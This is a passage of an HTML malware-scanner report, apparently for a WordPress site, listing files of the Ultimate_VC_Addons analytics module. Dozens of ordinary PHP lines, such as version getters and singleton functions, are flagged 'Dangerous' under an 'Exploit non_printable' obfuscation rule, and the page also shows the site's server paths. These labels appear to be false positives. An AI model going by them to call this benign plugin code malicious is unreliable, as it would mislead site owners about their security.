<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_send_json_success</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_499").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-analytics/class-bsf-analytics-loader.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.38 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_500" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_analytics</span><span style="color: #007700">() { </span><span style="color: #0000BB">$unique_entities </span><span style="color: #007700">= array(); if ( ! empty( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">entities </span><span style="color: #007700">) ) { foreach ( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">entities </span><span style="color: #007700">as </span><span style="color: #0000BB">$entity </span><span style="color: #007700">) { foreach ( </span><span style="color: #0000BB">$entity </span><span style="color: #007700">as </span><span style="color: #0000BB">$key </span><span style="color: #007700">=> </span><span style="color: #0000BB">$data </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">] ) ) { if ( </span><span style="color: #0000BB">file_exists</span><span style="color: #007700">( </span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">'path'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'/version.json' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$file_c</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_entity</span><span style="color: #007700">( </span><span style="color: #0000BB">$data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_analytics</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">file_get_contents_file_get_contents</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_500").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-analytics/class-bsf-analytics-stats.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.60 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 42</span><br><table id="file_501" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tz_offset</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float PHP version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_php_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">PHP_MAJOR_VERSION </span><span style="color: #007700">. </span><span style="color: #DD0000">'.' </span><span style="color: #007700">. </span><span style="color: #0000BB">PHP_MINOR_VERSION </span><span style="color: #007700">. </span><span style="color: #DD0000">'.' </span><span style="color: #007700">. </span><span style="color: #0000BB">PHP_RELEASE_VERSION</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">phpversion</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int User count</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_user_count</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 133</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$user_count</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">active plugin</span><span style="color: #DD0000">'s list.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 142</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_active_plugins</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is loaded</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_plugin_data' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 161</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">formatted plugin data</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">format_plugin</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float SSL version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_curl_ssl_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">curl_curl_version</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$curl</span><span style="color: #007700">[</span><span style="color: #DD0000">'ssl_version'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$curl</span><span style="color: #007700">[</span><span style="color: #DD0000">'ssl_version'</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 193</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float cURL version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_curl_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 201</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$curl</span><span style="color: #007700">[</span><span style="color: #DD0000">'version'</span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$curl</span><span style="color: #007700">[</span><span style="color: #DD0000">'version'</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float MySQL version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 210</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_mysql_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wpdb</span><span style="color: #007700">-></span><span style="color: #0000BB">db_version</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_content_writable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_is_writable</span><span style="color: #007700">( </span><span style="color: #0000BB">$upload_dir</span><span style="color: #007700">[</span><span style="color: #DD0000">'basedir'</span><span style="color: #007700">] );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 231</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_timezone_string' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string timezone string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_timezone_string</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$timezone_string</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$tz_offset</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">object</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">stats data</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_stats</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_stats'</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_default_stats</span><span style="color: #007700">() );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_default_stats</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_501").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-analytics/class-bsf-analytics.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 35</span><br><table id="file_502" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_option_to_network</span><span style="color: #007700">( </span><span style="color: #0000BB">$option</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) { if ( isset( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'option_page'</span><span style="color: #007700">] ) && </span><span style="color: #DD0000">'general' </span><span style="color: #007700">=== </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'option_page'</span><span style="color: #007700">] ) { if ( </span><span style="color: #0000BB">get_site_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$option </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">update_site_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$option</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">); } else { </span><span style="color: #0000BB">add_site_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$option</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">); } } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
